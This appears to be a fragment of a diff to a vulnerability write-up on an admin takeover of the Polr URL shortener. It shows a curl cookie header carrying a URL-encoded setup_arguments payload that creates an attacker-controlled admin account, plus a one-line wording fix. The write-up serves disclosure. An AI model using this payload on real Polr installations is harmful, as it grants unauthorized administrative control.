Polr URL Shortener Admin Takeover

 --header 'Cookie: setup_arguments=%7B%22acct_username%22%3A%22adminuser%22%2C%22acct_email%22%3A%22adminuser%40gmail.com%22%2C%22acct_password%22%3A%22adminuser%22%2C%22setup_auth_key%22%3Atrue%7D;'

-I was then able to login with my malicious account, adminuser and access the admin management panel.
+I was then able to log in with my malicious account, adminuser, and access the admin management panel.

 Polr Admin Panel